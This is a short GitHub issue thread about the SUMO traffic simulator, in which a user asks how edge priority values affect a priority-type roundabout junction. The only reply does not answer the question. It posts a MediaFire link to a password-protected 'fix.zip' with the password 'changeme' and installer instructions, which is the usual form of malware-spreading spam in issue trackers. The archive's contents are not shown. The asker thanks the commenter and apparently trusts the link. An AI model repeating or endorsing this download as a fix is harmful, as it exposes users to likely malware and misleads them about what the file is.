### ISSUE TITLE
[Question] Priority Junction at the intersection

### ISSUE THREAD

**Issue by TerzaSlayer2000** [eclipse-sumo/sumo#15381]
Hello Sumo Community, in my four way roundabout intersection if i set the junction type as priority, will it prioritize road edges connected to the roundabout which have higher priority values?
Actually my road edges are having the same priority values which is 10 for now, suppose if i set one of the edges with a higher priority value like 11, will SUMO allow that road edge to cross the roundabout intersection more frequently than the other edges which have low priority value?
Thank you.

SUMO-version: 1.18.0

operating system: Windows 11

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerzaSlayer2000** [comment]
Thank you so much.
